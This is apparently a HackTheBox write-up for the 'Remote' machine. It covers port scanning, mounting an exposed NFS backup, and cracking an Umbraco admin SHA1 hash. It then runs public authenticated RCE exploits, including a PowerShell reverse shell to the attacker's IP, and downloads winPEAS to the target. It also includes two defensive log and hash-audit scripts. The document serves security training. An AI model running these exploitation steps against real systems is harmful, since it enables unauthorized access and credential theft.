Remote
Port scan
u505@naos:~/HTB/Machines/Remote$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.180
Starting masscan 1.0.5 at 2020-12-30 21:48:54 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 111/tcp on 10.10.10.180
Discovered open port 49667/tcp on 10.10.10.180
Discovered open port 49666/tcp on 10.10.10.180
Discovered open port 2049/tcp on 10.10.10.180
Discovered open port 49680/tcp on 10.10.10.180
Discovered open port 49679/tcp on 10.10.10.180
Discovered open port 445/tcp on 10.10.10.180
Discovered open port 21/tcp on 10.10.10.180
Discovered open port 135/tcp on 10.10.10.180
Discovered open port 49678/tcp on 10.10.10.180
Discovered open port 49664/tcp on 10.10.10.180
Discovered open port 80/tcp on 10.10.10.180
Discovered open port 49665/tcp on 10.10.10.180
Discovered open port 5985/tcp on 10.10.10.180
Discovered open port 139/tcp on 10.10.10.180
Discovered open port 47001/tcp on 10.10.10.180
u505@naos:~/HTB/Machines/Remote$ nmap -sC -sV remote
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-30 16:49 EST
Nmap scan report for remote (10.10.10.180)
Host is up (0.037s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind      2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd       1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8m06s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-12-30T21:58:02
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.95 seconds
u505@naos:~/HTB/Machines/Remote$ nmap -p 5985 -sC -sV remote
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-30 16:52 EST
Nmap scan report for remote (10.10.10.180)
Host is up (0.037s latency).

PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.46 seconds
Ftp enum
u505@naos:~/HTB/Machines/Remote$ ftp remote
Connected to remote.
220 Microsoft FTP Service
Name (remote:u505): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> put userlist
local: userlist remote: userlist
200 PORT command successful.
550 Access is denied.
ftp> quit
221 Goodbye.
Anonymous FTP access is allowed, but the directory is empty and uploads are denied.
Web Enumeration
Web enumeration shows that the site runs the Umbraco CMS.
Search exploit
u505@naos:~/HTB/Machines/Remote$ searchsploit umbraco
------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------ ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | php/webapps/44988.txt
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
Exploit 46153 looks like a good fit, but it requires authentication.
Dirsearch
Dirsearch also finds the reference to Umbraco.
u505@naos:~/HTB/Machines/Remote$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt,html,htm,aspx,config,js" -f -t 1000 -u http://10.10.10.180
Extensions: txt, html, htm, aspx, config, js | HTTP method: GET | Threads: 1000 | Wordlist size: 1764160
Error Log: /opt/utils/dirsearch/logs/errors-20-12-31_08-19-34.log
Target: http://10.10.10.180/
Output File: /opt/utils/dirsearch/reports/10.10.10.180/_20-12-31_08-19-35.txt
[08:19:35] Starting:
[08:19:35] 200 -   2KB - /blog.aspx
[08:19:36] 200 -   3KB - /contact/
[08:19:36] 200 -   2KB - /products/
[08:19:36] 200 -   2KB - /home
[08:19:36] 200 -   2KB - /default.aspx
[08:19:36] 200 -   2KB - /home/
[08:19:36] 200 -   3KB - /contact
[08:19:36] 200 -   2KB - /products
[08:19:36] 200 -   2KB - /blog
[08:19:36] 200 -   2KB - /blog/
[08:19:36] 200 -   2KB - /products.aspx
[08:19:36] 200 -   3KB - /contact.aspx
[08:19:37] 200 -   2KB - /home.aspx
[08:19:37] 500 -   3KB - /product.aspx
[08:19:37] 200 -   2KB - /people
[08:19:37] 200 -   2KB - /people/
[08:19:37] 200 -   2KB - /people.aspx
[08:19:37] 500 -   3KB - /product
[08:19:37] 500 -   3KB - /product/
[08:19:37] 200 -   2KB - /Default.aspx
[08:19:41] 200 -   2KB - /Home
[08:19:41] 200 -   2KB - /Home.aspx
[08:19:46] 200 -   2KB - /Home/
[08:19:52] 200 -   2KB - /Products.aspx
[08:19:52] 200 -   2KB - /Products/
[08:19:52] 200 -   2KB - /Products
[08:19:58] 200 -   3KB - /Contact.aspx
[08:19:58] 200 -   3KB - /Contact/
[08:19:58] 200 -   3KB - /Contact
[08:20:04] 302 -  126B - /install/  ->  /umbraco/
[08:20:05] 302 -  126B - /install  ->  /umbraco/
[08:20:23] 200 -   2KB - /Blog.aspx
[08:20:23] 200 -   2KB - /Blog/
[08:20:23] 200 -   2KB - /Blog
[08:20:28] 200 -   2KB - /about-us/
[08:20:28] 200 -   2KB - /about-us
[08:20:28] 200 -   2KB - /about-us.aspx
[08:20:42] 200 -   2KB - /People/
[08:20:42] 200 -   2KB - /People.aspx
[08:20:42] 200 -   2KB - /People
[08:21:09] 500 -   3KB - /Product
[08:21:09] 500 -   3KB - /Product/
[08:21:10] 500 -   3KB - /Product.aspx
[08:21:18] 400 -   11B - /base/
[08:21:47] 302 -  126B - /INSTALL  ->  /umbraco/
[08:21:47] 302 -  126B - /INSTALL/  ->  /umbraco/
[08:21:58] 500 -   3KB - /master
[08:21:58] 500 -   3KB - /master.aspx
[08:21:58] 200 -   2KB - /1112/
[08:21:58] 200 -   2KB - /1112.aspx
...
AD enum
Without valid credentials, SMB and WinRM enumeration yields nothing useful.
u505@naos:~/HTB/Machines/Remote$ crackmapexec smb 10.10.10.180/32
SMB         10.10.10.180    445    REMOTE           [*] Windows 10.0 Build 17763 x64 (name:REMOTE) (domain:remote) (signing:False) (SMBv1:False)
u505@naos:~/HTB/Machines/Remote$ crackmapexec winrm 10.10.10.180/32
WINRM       10.10.10.180    5985   NONE             [*] None (name:10.10.10.180) (domain:None)
WINRM       10.10.10.180    5985   NONE             [*] http://10.10.10.180:5985/wsman
u505@naos:~/HTB/Machines/Remote$ crackmapexec smb 10.10.10.180/32 --rid-brute
SMB         10.10.10.180    445    REMOTE           [*] Windows 10.0 Build 17763 x64 (name:REMOTE) (domain:remote) (signing:False) (SMBv1:False)
SMB         10.10.10.180    445    REMOTE           [-] Error creating DCERPC connection: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
NFS enum
Nmap listed an NFS service. Let's list the exported folders.
u505@naos:~/HTB/Machines/Remote$ nmap -p 2049 -sV --script=nfs-showmount remote
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-31 08:38 EST
Nmap scan report for remote (10.10.10.180)
Host is up (0.038s latency).

PORT     STATE SERVICE VERSION
2049/tcp open  mountd  1-3 (RPC #100005)
| nfs-showmount:
|_  /site_backups

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds
Mount the export.
u505@naos:~/HTB/Machines/Remote$ mkdir nfs
u505@naos:~/HTB/Machines/Remote$ sudo mount -t nfs remote:/site_backups nfs
u505@naos:~/HTB/Machines/Remote$ df -h nfs
Filesystem            Size  Used Avail Use% Mounted on
remote:/site_backups   30G   12G   19G  40% /opt/HTB/Machines/Remote/nfs
u505@naos:~/HTB/Machines/Remote$ cd nfs
u505@naos:~/HTB/Machines/Remote/nfs$ ls -ltr
total 115
-rwx------ 1 nobody 4294967294    89 Nov  1  2018 Global.asax
-rwx------ 1 nobody 4294967294   152 Nov  1  2018 default.aspx
-rwx------ 1 nobody 4294967294 28539 Feb 20  2020 Web.config
drwx------ 2 nobody 4294967294    64 Feb 20  2020 App_Browsers
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 App_Plugins
drwx------ 2 nobody 4294967294    64 Feb 20  2020 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20  2020 bin
drwx------ 2 nobody 4294967294    64 Feb 20  2020 css
drwx------ 2 nobody 4294967294  8192 Feb 20  2020 Config
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 Media
drwx------ 2 nobody 4294967294    64 Feb 20  2020 scripts
drwx------ 2 nobody 4294967294  8192 Feb 20  2020 Umbraco
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 Umbraco_Client
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 Views
drwx------ 2 nobody 4294967294  4096 Feb 20  2020 App_Data
User enumeration
After a long search, the App_Data folder turns out to contain useful information. The logs record successful logins for the user admin@htb.local.
u505@naos:~/HTB/Machines/Remote/nfs/App_Data/Logs$ grep "Login attempt" UmbracoTraceLog.remote.txt
2020-02-20 02:38:18,746 [P4392/D2/T10] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
2020-02-20 02:38:57,527 [P4392/D2/T30] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.137
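The two log lines above are enough to build a small detection check. The script below is an added example (not part of the original write-up, and not Umbraco code): it parses the "Login attempt succeeded/failed for username X from IP address Y" lines that Umbraco.Core.Security.BackOfficeSignInManager writes, lists successful logins per account with their source addresses, and flags any account/IP pair that accumulated a burst of failures, noting whether that same address also succeeded. The two "succeeded" lines are copied from the write-up; the "failed" lines, the threshold of 3 and the function names are constructed for the example.

```python
"""Triage Umbraco back-office sign-in events from UmbracoTraceLog.

Added example (not from the original write-up). It parses the
"Login attempt succeeded/failed for username X from IP address Y" lines
written by Umbraco.Core.Security.BackOfficeSignInManager, lists the
successful logins per account with their source addresses, and flags any
(account, IP) pair with a burst of failures, noting whether that same
address also logged in successfully.
"""
import re
from collections import Counter, defaultdict

LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}),\d+ .*?BackOfficeSignInManager - "
    r"Event Id: \d+, state: Login attempt (?P<result>succeeded|failed) "
    r"for username (?P<user>\S+) from IP address (?P<ip>\S+)$"
)

# Constructed sample: four failures from .137 (made up, same shape as the real
# lines), followed by the two real "succeeded" lines from the write-up.
SAMPLE_LOG = """\
2020-02-20 02:36:02,118 [P4392/D2/T12] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username admin@htb.local from IP address 192.168.195.137
2020-02-20 02:36:09,455 [P4392/D2/T12] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username admin@htb.local from IP address 192.168.195.137
2020-02-20 02:36:15,902 [P4392/D2/T14] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username admin@htb.local from IP address 192.168.195.137
2020-02-20 02:36:21,377 [P4392/D2/T14] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username admin@htb.local from IP address 192.168.195.137
2020-02-20 02:38:18,746 [P4392/D2/T10] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
2020-02-20 02:38:57,527 [P4392/D2/T30] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.137
"""


def parse_login_events(text):
    """Return one dict (ts, result, user, ip) per sign-in line; other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = LOGIN_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def summarise(events, fail_threshold=3):
    """Successful logins per account, plus (account, ip) pairs at or above the failure threshold."""
    failures = Counter()
    successes = defaultdict(set)
    for ev in events:
        if ev["result"] == "failed":
            failures[(ev["user"], ev["ip"])] += 1
        else:
            successes[ev["user"]].add(ev["ip"])
    suspicious = [
        {
            "user": user,
            "ip": ip,
            "failures": count,
            # A success from the same address that produced the burst is the case to look at first.
            "same_ip_succeeded": ip in successes.get(user, set()),
        }
        for (user, ip), count in failures.items()
        if count >= fail_threshold
    ]
    return {
        "successes": {user: sorted(ips) for user, ips in successes.items()},
        "suspicious": suspicious,
    }


if __name__ == "__main__":
    report = summarise(parse_login_events(SAMPLE_LOG))
    for user, ips in report["successes"].items():
        print(f"{user}: successful logins from {', '.join(ips)}")
    for s in report["suspicious"]:
        print(f"{s['user']} from {s['ip']}: {s['failures']} failures, same IP succeeded: {s['same_ip_succeeded']}")
```

Run it against a real UmbracoTraceLog by reading the file into `parse_login_events`; only the sign-in lines match the regex, so the rest of the trace log is ignored.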
Another interesting file is Umbraco.sdf, which is the database of the CMS. SDF files hold a compact database saved in the SQL Server Compact (SQL CE) format.
u505@naos:~/HTB/Machines/Remote/nfs/App_Data$ ls -ltr
total 1969
-rwx------ 1 nobody 4294967294 1965978 Feb 20 2020 Umbraco.sdf
-rwx------ 1 nobody 4294967294 36832 Feb 20 2020 umbraco.config
drwx------ 2 nobody 4294967294 64 Feb 20 2020 cache
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Logs
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Models
drwx------ 2 nobody 4294967294 64 Feb 20 2020 packages
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 TEMP
We copy the database.
u505@naos:~/HTB/Machines/Remote/nfs/App_Data$ cp Umbraco.sdf ../../
I didn't find an easy way to view the file's content, so I tried strings. There is a SHA1 hash for the user admin@htb.local.
u505@naos:~/HTB/Machines/Remote/nfs/App_Data$ cd ../../
u505@naos:~/HTB/Machines/Remote$ strings Umbraco.sdf | head -n 15
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
@{pv
qpkaj
dAc0^A\pW
(1&a$
"q!Q
umbracoDomains
domainDefaultLanguage
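The strings output above shows two password storage formats side by side in the same users table: the admin account carries a legacy unsalted SHA1 digest (40 hex characters before the passwordConfig JSON), while the smith accounts use the salted HMACSHA256 format (a base64 salt followed by a base64 digest). The script below is an added example (not part of the original write-up, and not Umbraco code) that pulls such user records out of `strings`-style text using the {"hashAlgorithm":...} marker, flags accounts still on the legacy format, and shows with a single hashlib call why that format is weak. SAMPLE is trimmed from the write-up's output; the regex shapes (16-byte salt, 32-byte HMAC digest) are inferred from it, and the function names are mine.

```python
"""Audit the password-hash formats in Umbraco user records.

Added example, not part of the original write-up. Umbraco 7 stores each
back-office user's password field next to a JSON passwordConfig such as
{"hashAlgorithm":"SHA1"} or {"hashAlgorithm":"HMACSHA256"}. The parser
locates that marker, reads the hash material immediately before it and the
e-mail immediately after it, and flags records still on unsalted SHA1.
"""
import hashlib
import re

# Trimmed copy of the write-up's `strings Umbraco.sdf` output (three records).
SAMPLE = """\
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
"""

CONFIG_RE = re.compile(r'\{"hashAlgorithm":"(?P<alg>[A-Za-z0-9]+)"\}')
# Legacy format: 40 hex characters immediately before the passwordConfig JSON.
SHA1_RE = re.compile(r"(?P<hash>[0-9a-f]{40})$")
# Salted format as seen in the sample: base64 of a 16-byte salt (24 chars, "==")
# followed by base64 of a 32-byte HMAC-SHA256 digest (44 chars, "=").
HMAC_RE = re.compile(r"(?P<salt>[A-Za-z0-9+/]{22}==)(?P<hash>[A-Za-z0-9+/]{43}=)$")
# After the JSON: the user's e-mail, then the culture (e.g. en-US) and the record GUID.
EMAIL_RE = re.compile(r"^(?P<email>[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+?)[a-z]{2}-[A-Z]{2}[0-9a-f]{8}-")

LEGACY_ALGORITHMS = {"SHA1"}  # unsalted, single-pass digest: what the admin account uses


def parse_user_records(text):
    """Return one dict per passwordConfig marker found in *text*."""
    records = []
    for line in text.splitlines():
        for m in CONFIG_RE.finditer(line):
            alg = m.group("alg")
            before, after = line[:m.start()], line[m.end():]
            rec = {"algorithm": alg, "hash": None, "salt": None,
                   "legacy": alg in LEGACY_ALGORITHMS}
            if alg == "SHA1":
                h = SHA1_RE.search(before)
                rec["hash"] = h.group("hash") if h else None
            elif alg == "HMACSHA256":
                h = HMAC_RE.search(before)
                if h:
                    rec["salt"], rec["hash"] = h.group("salt"), h.group("hash")
            e = EMAIL_RE.match(after)
            rec["email"] = e.group("email") if e else None
            records.append(rec)
    return records


def legacy_sha1_matches(record, candidate):
    """True if an unsalted-SHA1 record is exactly the SHA1 of *candidate* (no salt, no iterations)."""
    if record["algorithm"] != "SHA1" or not record["hash"]:
        return False
    return hashlib.sha1(candidate.encode("utf-8")).hexdigest() == record["hash"]


def weak_accounts(records):
    """(email, algorithm) for every record still on a legacy algorithm; email is None when absent."""
    return [(r["email"], r["algorithm"]) for r in records if r["legacy"]]


if __name__ == "__main__":
    recs = parse_user_records(SAMPLE)
    for r in recs:
        print(r["email"], r["algorithm"], "LEGACY" if r["legacy"] else "salted")
    print("weak accounts:", weak_accounts(recs))
```

The point of `legacy_sha1_matches` is that an unsalted SHA1 digest needs no per-user work at all: one digest computation per candidate confirms or rejects it, which is exactly what the hashcat run in the next section exploits at millions of guesses per second. The HMACSHA256 records carry a per-user salt, so the same shortcut does not apply to them.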
Crack password
u505@naos:~/HTB/Machines/Remote$ hashcat --example-hashes | grep -A1 -B 2 SHA1 | head -n 10
MODE: 100
TYPE: SHA1
HASH: b89eaac7e61417341b710b727768294d0e6a277b
--
MODE: 150
TYPE: HMAC-SHA1 (key = $pass)
HASH: 02b256705348a28b1d6c0f063907979f7e0c82f8:10323
--
We store the hash in a file.
u505@naos:~/HTB/Machines/Remote$ cat hash_admin@htb.local
b8be16afba8c314ad33d812f22a04991b90e2aaa
We run hashcat.
u505@naos:~/HTB/Machines/Remote$ hashcat -m 100 hash_admin@htb.local /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.1.1) starting...
...
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese

Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA1
Hash.Target......: b8be16afba8c314ad33d812f22a04991b90e2aaa
Time.Started.....: Wed Dec 30 18:22:57 2020 (1 sec)
Time.Estimated...: Wed Dec 30 18:22:58 2020 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  7962.8 kH/s (5.96ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 9830400/14344384 (68.53%)
Rejected.........: 0/9830400 (0.00%)
Restore.Point....: 9502720/14344384 (66.25%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: bounty11 -> babypolk07
Hardware.Mon.#1..: Temp: 39c Util: 47% Core:1032MHz Mem:2505MHz Bus:16

Started: Wed Dec 30 18:22:54 2020
Stopped: Wed Dec 30 18:22:59 2020
We find the password.
u505@naos:~/HTB/Machines/Remote$ hashcat -m 100 hash_admin@htb.local /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese
CMS and remote command execution (RCE)
Access CMS
With the credentials, we can log in to the Umbraco CMS.
As expected, the installed version is the vulnerable one.
RCE
u505@naos:~/HTB/Machines/Remote$ searchsploit Umbraco
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit)                                 | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                          | aspx/webapps/46153.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                          | php/webapps/44988.txt
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
u505@naos:~/HTB/Machines/Remote$ searchsploit -m 46153
  Exploit: Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/46153
     Path: /usr/share/exploitdb/exploits/aspx/webapps/46153.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Remote/46153.py
This PoC only launches Calc on the target. The following variant of the same exploit lets you specify the command on the command line.
u505@naos:~/HTB/Machines/Remote$ wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
--2020-12-30 18:35:55--  https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.0.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3202 (3.1K) [text/plain]
Saving to: ‘exploit.py’

exploit.py          100%[===================>]   3.13K  --.-KB/s    in 0s

2020-12-30 18:35:55 (17.2 MB/s) - ‘exploit.py’ saved [3202/3202]
Execute ipconfig to see the IP.
u505@naos:~/HTB/Machines/Remote$ python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://remote' -c ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::5db8:182f:c853:f34d
   Link-local IPv6 Address . . . . . : fe80::5db8:182f:c853:f34d%13
   IPv4 Address. . . . . . . . . . . : 10.10.10.180
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7900%13
                                       10.10.10.2
And execute the whoami command.
u505@naos:~/HTB/Machines/Remote$ python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://remote' -c whoami
iis apppool\defaultapppool
Finally, this variant of the same exploit opens a PowerShell reverse shell.
u505@naos:~/HTB/Machines/Remote$ wget https://raw.githubusercontent.com/Jonoans/Umbraco-RCE/master/exploit.py
--2020-12-30 18:41:03--  https://raw.githubusercontent.com/Jonoans/Umbraco-RCE/master/exploit.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.0.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3950 (3.9K) [text/plain]
Saving to: ‘exploit.py.1’

exploit.py.1        100%[===================>]   3.86K  --.-KB/s    in 0.02s

2020-12-30 18:41:03 (165 KB/s) - ‘exploit.py.1’ saved [3950/3950]

u505@naos:~/HTB/Machines/Remote$ mv exploit.py.1 exploit_2.py
u505@naos:~/HTB/Machines/Remote$ wget https://raw.githubusercontent.com/Jonoans/Umbraco-RCE/master/exploit.cs
--2020-12-30 18:43:34--  https://raw.githubusercontent.com/Jonoans/Umbraco-RCE/master/exploit.cs
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.0.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1850 (1.8K) [text/plain]
Saving to: ‘exploit.cs’

exploit.cs          100%[===================>]   1.81K  --.-KB/s    in 0s

2020-12-30 18:43:35 (14.3 MB/s) - ‘exploit.cs’ saved [1850/1850]
Magically, the reverse shell is opened.
u505@naos:~/HTB/Machines/Remote$ python3 exploit_2.py -u admin@htb.local -p baconandcheese -w 'http://remote' -i 10.10.14.12
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.180 on port 49915
[+] Trying to bind to :: on port 4445: Done
[+] Waiting for connections on :::4445: Got connection from ::ffff:10.10.10.180 on port 49916
[*] Switching to interactive mode
PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
User flag
PS C:\Users\Public> cat user.txt <USER_FLAG>
Enumeration of the target
winPEAS
u505@naos:~/HTB/Machines/Remote$ mkdir web
u505@naos:~/HTB/Machines/Remote$ cd web/
u505@naos:~/HTB/Machines/Remote/web$ cp /opt/utils/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe ./
u505@naos:~/HTB/Machines/Remote/web$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
Once the web server is ready, we download the file.
PS C:\Users\Public> Invoke-WebRequest -Uri "http://10.10.14.12/winPEAS.exe" -OutFile "winPEAS.exe"
PS C:\Users\Public> .\winPEAS.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Creating Dynamic lists, this could take a while, please wait...
  - Checking if domain...
  - Getting Win32_UserAccount info...
...
  [?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
  OS Build Number: 17763
   [!] CVE-2019-0836 : VULNERABLE
    [>] https://exploit-db.com/exploits/46718
    [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/

   [!] CVE-2019-0841 : VULNERABLE
    [>] https://github.com/rogue-kdc/CVE-2019-0841
    [>] https://rastamouse.me/tags/cve-2019-0841/

   [!] CVE-2019-1064 : VULNERABLE
    [>] https://www.rythmstick.net/posts/cve-2019-1064/

   [!] CVE-2019-1130 : VULNERABLE
    [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

   [!] CVE-2019-1253 : VULNERABLE
    [>] https://github.com/padovah4ck/CVE-2019-1253

   [!] CVE-2019-1315 : VULNERABLE
    [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

   [!] CVE-2019-1385 : VULNERABLE
    [>] https://www.youtube.com/watch?v=K6gHnr-VkAg

   [!] CVE-2019-1388 : VULNERABLE
    [>] https://github.com/jas502n/CVE-2019-1388

